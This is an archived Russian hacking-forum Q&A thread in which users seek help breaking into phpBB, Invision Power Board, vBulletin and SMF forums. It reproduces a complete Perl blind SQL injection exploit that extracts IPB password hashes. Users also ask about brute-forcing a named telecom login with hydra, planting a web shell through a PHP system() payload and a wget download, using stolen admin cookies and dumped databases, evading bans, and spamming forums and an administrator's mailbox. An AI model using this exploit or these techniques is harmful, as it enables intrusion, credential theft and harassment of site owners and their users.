Просмотр полной версии : [Задай Вопрос - Получи Ответ]
^ попробуй в опере ву управлении кукисами подменить своина на те чтон наснифил
Всем доброго времени суток! Хотел бы узнать, как узнать внутренний ip-адрес пользователя на форуме, зная внешний (Я имею доступ к панели администратора, движок форума phpBB)
Заранее спасибо.
Привет всем, такой вопрос, ОЧЕНЬ ОЧЕНЬ срочно нужен нормальный, а лучше лучший брут для веб форм.... Очень надо... ПлЗ помогите....
Привет всем, такой вопрос, ОЧЕНЬ ОЧЕНЬ срочно нужен нормальный, а лучше лучший брут для веб форм.... Очень надо... ПлЗ помогите....
hydra
Есть сайт https://www.selfcare.tele2.ru/work.html там есть система входа (так вот как сделать через гидру брут с 1 логином и списком пароле...) Если можно видео. Спс...
подскажите как узнать на каком мыле держиться форум?
HAXTA4OK
16.09.2009, 13:37
ну если mail.ru имеет erwer@mail.ru yandex.ru имеет rtrt@yandex.ru то твой думаю имеет forum.tytsite.ru - mail@tytsite.ru
Devoldini
17.09.2009, 02:33
Подскажите как узнать email на который идет ретрив пасса юзера vbulletin?
СИ не катит, так как это "мертвый аккаунт".
Или подскажите актуальный брут.
Taylorith
05.10.2009, 17:05
Решила проверить какая версия у данного форума, http://wow-tk.ru/forum/
прошлась по проверкам вот тут http://forum.antichat.ru/thread89112.html ,
2.1.*
Присутсвуют папка
/ips_kernel/PEAR/
присутствует файлы:
info.php
реагирует на 403 "доступ запрещен" например к папке
/ips_kernel/ как 403: IBForums-> Forbidden
из вышеперечимсленного сработало тока последнее... так какая же версия у форма , выше чем 2.1.* ?
помогите пожалуйста. :rolleyes:
кто нить может помочь, чет никак не пойму что за версия.
так какая же версия у форма , выше чем 2.1.* ?
помогите пожалуйста. :rolleyes:
кто нить может помочь, чет никак не пойму что за версия.
Если еще актуально... то да, выше чем 2.1.*.
Вернее это 2.3.*
https://forum.antichat.ru/showthread.php?p=910367
Patronik
16.10.2009, 14:51
Есть експлоит на перле. Но я перла не знаю.
#!/usr/bin/perl
## Invision Power Board SQL injection exploit by RST/GHC
## vulnerable forum versions : 1.* , 2.* (<2.0.4)
## tested on version 1.3 Final and version 2.0.2
## * work on all mysql versions
## * work with magic_quotes On (use %2527 for bypass magic_quotes_gpc = On)
## (c)oded by 1dt.w0lf
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~
## screen:
## ~~~~~~~
## r57ipb2.pl blah.com /ipb13/ 1 0
## [~] SERVER : blah.com
## [~] PATH : /ipb13/
## [~] MEMBER ID : 1
## [~] TARGET : 0 - IPB 1.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## PASSWORD : 5f4dcc3b5aa765d61d8327deb882cf99
##
## r57ipb2.pl blah.com /ipb202/ 1 1
## [~] SERVER : blah.com
## [~] PATH : /ipb202/
## [~] MEMBER ID : 1
## [~] TARGET : 1 - IPB 2.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## MEMBER_LOGIN_KEY : f14c54ff6915dfe3827c08f47617219d
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~
## Greets: James Bercegay of the GulfTech Security Research Team
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~
## Credits: RST/GHC , http://rst.void.ru , http://ghc.ru
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~
use IO::Socket;
if (@ARGV < 4) { &usage; }
$server = $ARGV[0];
$path = $ARGV[1];
$member_id = $ARGV[2];
$target = $ARGV[3];
$pass = ($target)?('member_login_key'):('password');
$server =~ s!(http:\/\/)!!;
$request = 'http://';
$request .= $server;
$request .= $path;
$s_num = 1;
$|++;
$n = 0;
print "[~] SERVER : $server\r\n";
print "[~] PATH : $path\r\n";
print "[~] MEMBER ID : $member_id\r\n";
print "[~] TARGET : $target";
print (($target)?(' - IPB 2.*'):(' - IPB 1.*'));
print "\r\n";
print "[~] SEARCHING PASSWORD ... [|]";
($cmember_id = $member_id) =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
while(1)
{
if(&found(47,58)==0) { &found(96,122); }
$char = $i;
if ($char=="0")
{
if(length($allchar) > 0){
print qq{\b\b DONE ]
MEMBER ID : $member_id
};
print (($target)?('MEMBER_LOGIN_KEY : '):('PASSWORD : '));
print $allchar."\r\n";
}
else
{
print "\b\b FAILED ]";
}
exit();
}
else
{
$allchar .= chr($i);
}
$s_num++;
}
sub found($$)
{
my $fmin = $_[0];
my $fmax = $_[1];
if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }
$r = int($fmax - ($fmax-$fmin)/2);
$check = " BETWEEN $r AND $fmax";
if ( &check($check) ) { &found($r,$fmax); }
else { &found($fmin,$r); }
}
sub crack($$)
{
my $cmin = $_[0];
my $cmax = $_[1];
$i = $cmin;
while ($i<$cmax)
{
$crcheck = "=$i";
if ( &check($crcheck) ) { return $i; }
$i++;
}
$i = 0;
return $i;
}
sub check($)
{
$n++;
status();
$ccheck = $_[0];
$pass_hash1 = "%36%36%36%2527%20%4F%52%20%28%69%64%3D";
$pass_hash2 = "%20%41%4E%44%20%61%73%63%69%69%28%73%75%62%73%74%7 2%69%6E%67%28";
$pass_hash3 = $pass.",".$s_num.",1))".$ccheck.") /*";
$pass_hash3 =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
$nmalykh = "%20%EC%E0%EB%FB%F5%20%2D%20%EF%E8%E4%E0%F0%E0%F1%2 1%20";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80");
printf $socket ("GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s%s\nConnection: close\n\n",
$path,$server,$cmember_id,$pass_hash1,$cmember_id, $pass_hash2,$pass_hash3,$nmalykh);
while(<$socket>)
{
if (/Set-Cookie: session_id=0;/) { return 1; }
}
return 0;
}
sub status()
{
$status = $n % 5;
if($status==0){ print "\b\b/]"; }
if($status==1){ print "\b\b-]"; }
if($status==2){ print "\b\b\\]"; }
if($status==3){ print "\b\b|]"; }
}
sub usage()
{
print q(
Invision Power Board v < 2.0.4 SQL injection exploit
----------------------------------------------------
USAGE:
~~~~~~
r57ipb2.pl [server] [/folder/] [member_id] [target]
[server] - host where IPB installed
[/folder/] - folder where IPB installed
[member_id] - user id for brute
targets:
0 - IPB 1.*
1 - IPB 2.* (Prior To 2.0.4)
e.g. r57ipb2.pl 127.0.0.1 /IPB/ 1 1
----------------------------------------------------
(c)oded by 1dt.w0lf
RST/GHC , http://rst.void.ru , http://ghc.ru
);
exit();
}
Етот експлоит ищет хеш в таблице форума IPB v1.3.1
скажите етот експлоит брутит поля таблиц или он находит если токо префикс имен таблиц стандартный типа "ibf_members".
Дело в том что я знаю что на интересующем меня форуме префик изменен в целях безопасности и он выглядит так ib_2f_members.
Скажите пожалуйста как отредактировать експлоит чтобы он делал скулю в таблицу с префиксом ib_2f???
Очень надо!
Totgeliebt
22.10.2009, 00:43
а как узнать какая версия форума?там SMF, IPB???если с низу ничего не написано)
Silly.worm
22.10.2009, 01:17
Totgeliebt,
посмотри тут: JFGI (http://jfgi.ru/)
Если не помогло, тогда - вторая ссылка в выдаче (http://www.nulled.ws/showthread.php?t=85232)
А еще это все есть на форуме здесь...
Как сделать бекап БД в форуме Phpbb на сервисе FlyBB??
ILYAtirtir
28.10.2009, 18:37
Достал пас админа с помощью сплойта Invision Power Board <= 2.3.5 от Elekt'а. В админку не пускает,пишет неверный логин или пароль. Может быть такое что у админа на форуме и в админке разный логин?
Достал пас админа с помощью сплойта Invision Power Board <= 2.3.5 от Elekt'а. В админку не пускает,пишет неверный логин или пароль. Может быть такое что у админа на форуме и в админке разный логин?
ILYAtirtir
конечно может быть, у самого встречалося как минимум раза 3
ILYAtirtir
29.10.2009, 06:58
Ну тогда как можно из базы узнать ник для входа в админку?А то через блинд скулю нету времени копаться.
Привет всем, вот такая ситуация:
на форуме секс народа есть тема "Развод девушек на интимные фото и видео" я тамнаписал свое мнениео том что нельзя такую тему держать, ну подумайте на месте тех девушек может оказатсяваша сестра или лучшая подруга!
девченки делают фото парням интимное доверяются а те твари вылаживают на публичный показ.
так вот я тамвысказал свое не согласие и меня забанили! блин ооочень обидно стало! вот что можно сделат?у меня есть адрес почты администратора главного, кто посоветует мож как то зафлудить заспамить? ну и просто поставьте себя на мое место, ты им правду а они тебя за правду банят(
ВСем здрям, как определить какой версии сайт\форум для дальнейшей работы"сорри за повтор если повторялось!!
HAXTA4OK
07.11.2009, 22:56
Смотря какой форум, тут же есть темы для каждого форума, и для каждого расписано как определить какая версия, если есть такая возможность
Проще почитать хотя бы начало темы ,что бы понять ,что будет в середине и ,задумаясь, дочитать до конца,ибо как именно определить тебе ни кто не скажет, тем более в неизвестном для нас форуме :)
Форум phpBB 2.0.23.
Через инъекцию получил логин пароль админа.
Перепробовал способы описанные здесь, но залить шелл не удалось. Да и статьи были старыми, аж 2006 года.
Подскажите, плиз , способы заливки шелла на мой форум.
Также, буду благодарен ссылкам на актуальные статьи.
Спасибо!
У меня после запуска через пару минут сохраняет сеесию и вырубается.Подскажите в чем дело
coreacovdima
27.11.2009, 21:36
Как определить версию IPB 3.0.*?
З.Ы.: в гугль не посылать, я из него полдня не вылазил. Везде инструкции только по версиям 1.3, 2.0.* и 2.1.*
За качественный ответ или хотябы толковую ссылку поблагодарю от души ;-)
как юзать vBulletin 3.7.3 Visitor Messages XSS/XSRF + worm напишет кто нибудь ? ..а если и видос запишет то я просто от всей души буду благодарен !)
Заблокировали на форуме, зашол через прокси, все норм работал 2 дня, после чего вновь заблокировали, и теперь смена прокси не помагает.
подскажите, как обойти?
Заблокировали на форуме, зашол через прокси, все норм работал 2 дня, после чего вновь заблокировали, и теперь смена прокси не помагает.
подскажите, как обойти?
Нужно проверить, чтобы прокси не выдавал реального адреса, то есть был анонимным, а не прозрачным. Ну и почистить куки!
гаррет-тень
22.12.2009, 16:35
Всем привет. Не подскажите на сайте с помощью брута ломаю пароль. Но при смене устройства нужно ввести секрет. Можно его как-нибудь брутом, если нет то как по другому?
coreacovdima
24.12.2009, 14:42
Заблокировали на форуме, зашол через прокси, все норм работал 2 дня, после чего вновь заблокировали, и теперь смена прокси не помагает.
подскажите, как обойти?
Возможно, тебя забанили так называемым "супербаном". Для его обхода нужно:
1) Сменить IP тем же прокси (желательно анонимным)
2) Поменять разрешение экрана.
3) Почистить куки.
4) Сменить ID браузера. (В этом поможет программка AntiBan)
Ну еще желательно зарегистрировать другой аккаунт.
Только после всего вышеперечисленного входить на форум. Иногда достаточно только 1 и 4 пунктов, но все же советую выполнить весь список.
Assassin7
09.01.2010, 19:24
есть куки админов трекеров много но захожу в админку просит пороль как можно узнать пороль? на самом трекере сижу под админом (сами трекеры на двиге phpBB)
ася 177-166-881
Подскажите пожалуйста, как сделать дамп базы данных, имея расшифрованные пароли от mysql? Пароли получил через SQL инъекцию, но вот как теперь базу потянуть? Раньше они на мастерхосте были, я забирал черз phpmyadmin, а теперь не пойму, как забрать. :(
Подскажите пожалуйста как узнать пути до панели администратора в vBulletin? :)
Обычно - you forum.com/admincp
Нашёл на этом и на других форумах много сплойтов для IPB 1.3 final, но ни один из них не работает. В чём дело? Может, форум, который я пытаюсь взломать, пропатчен? Или эти сплойты уже устарели?
mi_vse_umrem
14.02.2010, 23:41
есть форум на SMF 1.1.11 , хочется на немного поиметь права , тыкните носом с чего начать
Вообщем не стал открывать новую тему, напишу здесь. Залил я шелл через IPB форум и столкнулся с проблемой, на сервере стоит Linux 2.6.18-92.1.22.el5; PHP 5.2.12 Safe mode: OFF. Форум находиться на сабдомене (forum.сайт.ру). Юзаю комманду whoami - я apache. Перебраться на каталог выше форума не получаеться, нет прав, можно как нибудь это обойти. ;)
4uk_n00rris
18.02.2010, 22:07
Задам мб дика нубский вопрос)) как я понял, при запуске сплоита с командной строки (cmd), на сервере в логах остается реальное айпи машины на которой сплоит был запущен.. вопрос заключается вот в чем: как совместить использование сплоитов и прокси? в некоторых php сплоитах есть возможность прописывать айпи и порт http прокси, а вот как быть с (pl, c, py)?? спасибо!
4uk_n00rris
18.02.2010, 22:10
Нашёл на этом и на других форумах много сплойтов для IPB 1.3 final, но ни один из них не работает. В чём дело? Может, форум, который я пытаюсь взломать, пропатчен? Или эти сплойты уже устарели?
1. мб в самом коде сплоита специально допущена ошибка, что бы не все могли юзать)
2. форум пропатчен
3. мб ты неправильно юзаешь сплоит...
Всем привет, как называется файл в IPB, где хроняться настройки для подключения к БД? И где он расположен?
Есть форум на phpbb3.
Скачал таблицу users БД из админки. Но поле user_password у многих пользователей пустое и хэша там нету.
Как такое может быть и где достать хэши паролей этих юзеров?
Есть форум на smf, надо его заспамить, подскажите есть ли там ограничения на кол-во постов с одного айпи? Или если спамить с одного логина, но менять айпишники можно обойти? Вообщем реально ли запостисть за 3-4 часа пару тысяч сообщений?
Возможно ли либо взломать либо создать STEAM своими ручками??
http://store.steampowered.com/
hijack24
02.03.2010, 13:23
Ищу рабочий сплоит для IPB 2.2.0, поделитесь плз информацией
прошу помочь, пытаюсь получить админ доступ к форуму
http://unp.3bb.ru/
Пробовал эксплоит на версии 1.2.2 и ниже (Remote injection exploit), результатов не дал.
Затем попробовал вот этот эксплоит
http://www.inattack.ru/ina_download/bug/exploit_282.txt
Процесс: использование эксплоита - выполнено, md5 пасс юзера не возвращает. Значит что эксплоит работает, но возникают какие-то проблемы в процессе, и так же исходя из этих данных версия движка форума 1.2.3-1.2.5 (по другому версию опознать не удалось)
Не надеюсь на развернутый ответь, скажите хотя бы в каком направлении копать :(
artyrka007
06.03.2010, 14:50
Не в курсе игровые автоматы в инете где есть не глюченные ?
неужели никто не подскажет?(
Как узнать Username or Domain?
Ситуация токая есть сайт от которого я хочу взять базу данных, но возникла одна проблема
1.Незнаю\ Username or Domain
2.Знаю\ мыло и пароль от мыла.
3.пытаюсь востоновить через https://secure.servage.net/cp/login/action:forgotten_password
Вот тут и возникает проблема, я не знаю Username or Domain
Как можно узнать Username or Domain
Admin Administratop не подходит
-GaLogEn-
20.03.2010, 19:38
установил Vbulletin 3.8
пробую войти в админку ничего не выходит. что делать?
логин и пароль верный.
Уважаемые
1 не могу поменять аватар
2 как узнать версию форума?
3 как скачать phpBB?
установил Vbulletin 3.8
пробую войти в админку ничего не выходит. что делать?
логин и пароль верный.
такого просто не бывает, логин пасс кстати ты прописывал в конфиге после установки тут /includes/config.php и прописать свой id в superadministraror
з.ы. а не хорошо воровать акки форумские по мылу чужие ; )
KAKAfon9I
28.03.2010, 15:51
Как узнать префикс бд в ipb?
2.*.*
сижу в панели администратора на форуме двиг phpbb
не могу найти где тут сделать дамп бд . подскажите?
сижу в панели администратора на форуме двиг phpbb
не могу найти где тут сделать дамп бд . подскажите?
сначала коннектис к БД
Есть что-нибудь на ipb 2.3.6 ?
сижу в панели администратора на форуме двиг phpbb
не могу найти где тут сделать дамп бд . подскажите?
вообще дампить бд лучше Этим (http://sypex.net) дампером а не из админки, так надёжней и качественней.
Есть Учетка главного модератора на форуме phpBB 3.0.7, есть ли какие нибудь уязвимости на заливку шела или доступа к админке форума?
JogaBonito
12.04.2010, 22:44
Есть дамп pb_2010-04-02_02-35.sql чё можно добыть ? кроме майлов и хешей ?
InfectedM
23.04.2010, 23:39
Есть форум phpBB © 2001, 2005 phpBB Group
Есть логин админа и 100% правильный пароль.
Но почему-то пишет что не подходит.
В пхпбб есть какиенить привязки акка по ip?
Если да,то как правило привязка осуществляется по маске подсети? если подискать подходящую прокси получится войти войти?
Есть форум phpBB © 2001, 2005 phpBB Group
Есть логин админа и 100% правильный пароль.
Но почему-то пишет что не подходит.
В пхпбб есть какиенить привязки акка по ip?
Если да,то как правило привязка осуществляется по маске подсети? если подискать подходящую прокси получится войти войти?
если ты подходишь близко к скрипту авторизации значит уже нет привязка к ip,
а твой пароль может быть пароль к админке а не пароль к форуму,
с какой таблицы вытащил? phpbb_users??
InfectedM
24.04.2010, 04:03
Все...там 2 базы от форума было -)стащил с 2 базы пас
Залогинился на форуме под админом.
но Теперь не заходит в админку :D
Пароль админа от админки и форума может бытьразным?
Если да ,то где искать пароль от админки?
Пытаюсь залить шелл на форум ипб (впервые), вот возникло пару вопросов, знающие люди пожалуйста помогите
Заливаю через мускуль
CREATE TABLE `ibf_shell` (`shl` TEXT NOT NULL) TYPE = MYISAM ; - прошло успешно
INSERT INTO `ibf_shell` ( `shl` ) VALUES (`<?system($_GET[‘c’]) ?>`); - тут жопа, команда не выполняется. Пишет Unknown column '' in 'field list'. (ругается на system($_GET)). Тобишь мне в колонке shl надо создать такую команду. Уверен на 80% что синтаксис неправильный.
SELECT `shl` FROM `ibf_shell` INTO OUTFILE `/www/forum/uploads/shell.php` - не дошел
DROP TABLE `ibf_shell` - прошло успешно
В общем загвоздка со второй строкой, как я уже писал - синтаксис неправильный. Уже и так и сяк пробовал, не выходит.
Потом сразу же вопрос, после выполнения этих мускуль комманд (удачно), мне прийдется дать cmd команды на сервер как я понимаю. Это делается посредством браузерной строки? Где можно просмотреть все возможные команды?
Читал что нужно выполнить запрос в строке браузера типа _http://www.xxx.com?c=wget -O shell.php _http://vasiliy.narod.ru/shell.php.
Заливаю через мускуль ибо другие способы не пашут... Смайлы, аттачи и пхтмл перепробовал.
Заранее спасибо!!
UPD
select 0x3c3f706870696e666f28293b3f3e into outfile 'Z:/home/site.ru/www/uploads/shell.php'
Access denied for user 'site.ru'@'localhost' (using password: YES)
Нехватает прав?
Hunter.1121
03.05.2010, 02:08
Здравствуйте. Пишу небольшой спамер для mybb форума, а именно для конструктора на easyforum.ru. Для отправки сообщения требуется параметр form_key, который генерится следующим кодом:
document.getElementById('formkey').innerHTML='<p id="AVnesYzGJxjCo">G22G3EG27G3B</p><div id="eyDsUB"><div id="TYlxONiwy">G75G74G20G74G79G70G65G3DG22G68G69G64G64G65G6EG22</div></div><strong id="tncgKQTIZx">GCEGA7GC0G7BGB2GA9G6AGBAG1EGFAGEEG55</strong><div id="yhaBMY">G67GCEG5FG2EG57G89G87G27GC6G11G6AGB8G6FG14GF2GE3GD 2GE3G6EGE0GBDG43G88G9FG9EG9EG55</div><span id="ltvIxnL">G1FG3AGD2GCCG63GB2G99GA9G13G3EGF8G95GDCGA0G92G48</span><p id="jqgeoDTtZ" class="BPpvliXLOEcdF">G07GC8G98GF6GE6G21GCFGEAG78G83G28GCDG79GC2G25G57G1 EG1D</p><h1 id="nNhSbpcfqwMaF" class="FrcivPVjbMKAe">G6BGC2G79GF5G7EGF0GDDGB5G57GE7GE5</h1><p id="XLOFK">GD9G4FG19G16G4DG99GADG08G3CGA5GE7G43G42GFD</p><div class="XLOFK" id="iGvPsRHN">GB7GDAGFBG7DG26GC8G30GEAG48GB9GD4GEAG8DG43G3FG62GC AGA0GE0G9FGF6GBDG88G9DG13G42G78G94</div><span id="QNenE">G61G53GDFG45GB0GD6GA1GA1G6EGBFG0DG5EG7B</span><div id="PiVnkNMvt" class="ltvIxnL">G66G6FG72G6DG63G6FG64G65G20G3DG20G27G3CG69G6EG70</div><span id="jIJhaCS" class="nNhSbpcfqwMaF">G38G38G34G38G64G34G31G65G35G39G35G61G63G32G33G62</span><strong id="UxsqgOZMIdf" class="UxsqgOZMIdf">G20G6EG61G6DG65G3DG22G66G6FG72G6DG5FG6BG65G79G22</strong><span class="GXtcledPN" id="BPpvliXLOEcdF">G20G76G61G6CG75G65G3DG22G33G39G34G31G31G32G37G32</span><div class="lEpuOYiPtFb" id="zcsIFHQkEJDUi">G61G31G62G36G32G37G36G62G37G62G37G37G35G33G34G31</div><strong class="PiVnkNMvt" id="LVCmvRSXOtEk">G5DGA8G32GE5GB5GC9G5DG19GBBGE3GB6GD5G3BG37GB0G20GB 0G6FGBBGB8GECG7B</strong>';
gabMq=flzySLCKEsGX('PiVnkNMvt');JHnXAPr=flzySLCKEs GX('XLOFK');zaFft=''+gabMq.innerHTML;HOfysg=flzySL CKEsGX('nNhSbpcfqwMaF');lhcGwFT=flzySLCKEsGX('TYlx ONiwy');ueRyN=flzySLCKEsGX('iGvPsRHN');XUTBf=zaFft +lhcGwFT.innerHTML;JIYxihL=''+ueRyN.innerHTML;FAvl XeM=flzySLCKEsGX('ltvIxnL');lohxuQ=flzySLCKEsGX('U xsqgOZMIdf');NdIUMT=JIYxihL+FAvlXeM.innerHTML;auym eCzU=XUTBf+lohxuQ.innerHTML;oPrYXA=flzySLCKEsGX('j qgeoDTtZ');rxzYsBv=flzySLCKEsGX('BPpvliXLOEcdF');c PRXdlVk=flzySLCKEsGX('iGvPsRHN');CIbcPo=NdIUMT+cPR XdlVk.innerHTML;yoqxBjlR=auymeCzU+rxzYsBv.innerHTM L;SctCousr=CIbcPo+cPRXdlVk.innerHTML;dMabf=flzySLC KEsGX('jqgeoDTtZ');kICKdfwi=flzySLCKEsGX('jIJhaCS' );mYVuyJIw=yoqxBjlR+kICKdfwi.innerHTML;DjZcpK=SctC ousr+dMabf.innerHTML;FCpfwNt=flzySLCKEsGX('zcsIFHQ kEJDUi');fGuAC=flzySLCKEsGX('XLOFK');SdpJigc=DjZcp K+fGuAC.innerHTML;jTiYL=mYVuyJIw+FCpfwNt.innerHTML ;WnzZJqs=flzySLCKEsGX('jqgeoDTtZ');ucIpCva=flzySLC KEsGX('AVnesYzGJxjCo');xXuGOmcl=jTiYL+ucIpCva.inne rHTML;QmzLKAG=SdpJigc+WnzZJqs.innerHTML;
document.getElementById('formkey').innerHTML=unesc ape(xXuGOmcl.replace(/G([\w]{2})/g,'%$1'));document.getElementById('formetc').inner HTML='<input type="hidden" name="form_etc" value="'+navigator.appName+'.::.'+navigator.appVersion+'">';
return true
}
function flzySLCKEsGX(id) {var item = null;if (document.getElementById) {item = document.getElementById(id);} else if (document.all){item = document.all[id];} else if (document.layers){item = document.layers[id];}return item;}// -->
Но каждый раз алгоритм генерации разный. Подскажите, есть ли готовый код на С++ для генерации этого form_key? Или код, пригодный к переносу на С++.
Поскажите, плиз, по следующему вопросу: Форум SMF 1.1.11 Периодически при заходе на форум выдаёт странную ошибку - Notice: Undefined variable: RC92FBC1E897D12BC703CD7124DAAC02C in /home/ruporne/public_html/barmaley/Themes/classic/images/english/style.css.php(1) : eval()'d code(1) : eval()'d code on line 1
Понятно, что что-то с таблицей стилей css, но что и можно ли что нибудь сделать просто как админ форума?..Или надо к хост- провайдеру всё таки обращаться?
Похоже, что у них там все сайты на серваке с этой ошибкой работают.
Ну понятно..3 дня прошло - ответов похоже не будет..И этот форум вымирает потихоньку..
Вопрос решился сменой хостинга.Проблема была у провайдера.
Вот читал статьи по взлому IPB и там сразу уже пишется о заливки шелл и т.д. и написано "Как получить доступ к админке я писал уже сто раз" Так вот я не могу найти тему где сказано, как получить доступ в админку на IPB 2.3.6. Киньте плз тему, или расскажите как получить доступ в админку на IPB 2.3.6. :confused:
vBulletin. Файл install/install.php не удалён, устанавливаю форум, но после всего серв требует удалить install/install.php и в админку не пускает, можно как-нибудь обойти?
Попалась в руки база одного форума.
Скачал и установил денвер на локальную машину, скачал и установил phpBB, с помощью sypex dumper залил имеющийся дамп БД. Но форум как был пустой так и остался. :confused:
Впервые занимался этим. Просьба подскажите что делать или почитать где ?
Заранее благодарю.
vBulletin. Файл install/install.php не удалён, устанавливаю форум, но после всего серв требует удалить install/install.php и в админку не пускает, можно как-нибудь обойти?
Э, после установки надо залезть на фтп и удалить этот инсталл.пхп чтобы никто посторонний не смог его запустить. И вообще снеси папку install лучше.
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot